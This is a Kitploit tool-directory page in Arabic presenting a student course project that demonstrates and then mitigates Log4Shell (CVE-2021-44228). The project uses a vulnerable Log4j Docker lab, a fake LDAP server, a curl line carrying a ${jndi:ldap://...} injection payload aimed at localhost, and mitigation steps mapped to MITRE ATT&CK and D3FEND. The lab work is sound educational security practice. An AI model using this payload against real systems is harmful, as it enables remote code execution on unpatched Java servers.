Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-homework9 — Log4Shell (CVE-2021-44228) إيضاح استغلال لـ SEAS 8405. يتضمن تطبيق Spring Boot ضعيف، وخادم LDAP وهمي، وإعداد Docker، وتعيين MITRE، واستجابة للحوادث، وتسجيل شاشة كامل. | Kitploit
أدوات/GitHubGitHub/serpilrivas/log4shell-homework9
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمالاستجابة للحوادثمختبرات وتدريب عملي
GitHubserpilrivas/log4shell-homework9

log4shell-homework9

Log4Shell (CVE-2021-44228) إيضاح استغلال لـ SEAS 8405. يتضمن تطبيق Spring Boot ضعيف، وخادم LDAP وهمي، وإعداد Docker، وتعيين MITRE، واستجابة للحوادث، وتسجيل شاشة كامل.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الواجب 9 – تأمين الأنظمة ضد هجمات Log4Shell

نظرة عامة

يوضح هذا المشروع استغلال وتخفيف ثغرة Log4Shell (CVE-2021-44228) باستخدام تطبيق ويب جافا تم حوسبته (Dockerized) مع Log4j 2.14.1 القابل للاستغلال. تشمل الإعدادات أيضًا خادم LDAP ضارًا محاكيًا لإظهار مسار هجوم حقن JNDI.

بعد الاستغلال، يتم تعزيز النظام من خلال ترقية Log4j، والتحقق من صحة المدخلات، وتطبيق توصيات MITRE D3FEND و ATT&CK.


هيكل المجلدات

root@kitploit:~
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf

كيفية التشغيل

1. بناء تطبيق Java (باستخدام Log4j القابل للاستغلال)

root@kitploit:~
docker build -t vulnerable-app .

2. تشغيل التطبيق باستخدام Docker Compose

root@kitploit:~
docker-compose up

سيعمل التطبيق على:
http://localhost:8080

3. بدء تشغيل خادم LDAP الوهمي (في نافذة طرفية جديدة)

root@kitploit:~
python3 ldap_server.py

4. محاكاة استغلال

أرسل طلبًا كهذا إلى التطبيق:

root@kitploit:~
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}

يجب أن يتلقى خادم LDAP الطلب (وهذا يحاكي استغلال JNDI).


كيف تم تعزيز النظام

بعد عرض الهجوم، تم تأمين النظام من خلال:

  • ترقية Log4j إلى الإصدار 2.17.0
  • التحقق من صحة المدخلات (حجب أنماط ${jndi:...})
  • تعطيل عمليات بحث الرسائل في التكوين
  • عزل Docker للحد من النطاق
  • تطبيق تقنيات MITRE D3FEND & ATT&CK

رسم خرائط MITRE

MITRE ATT&CK:

  • T1190: استغلال التطبيقات المواجهة للجمهور
  • T1210: استغلال الخدمات عن بُعد

MITRE D3FEND:

  • D3-IA: التحقق من صحة المدخلات
  • D3-HI: كشف التسلل القائم على المضيف
  • D3-DA: تعطيل الميزات غير الآمنة

التقرير

انظر mitigation_report.pdf لـ:

  • بنية النظام قبل / بعد
  • شرح Log4Shell
  • استراتيجية التخفيف
  • خطة الاستجابة للحوادث

تسجيل الشاشة

إذا لم يتم رفع الفيديو مباشرة، فهو متاح عبر الرابط الموجود في التقرير.


المؤلف

Serpil Rivas
SEAS 8405 – معماريات الأمن السيبراني
مايو 2025

تنزيل الأداة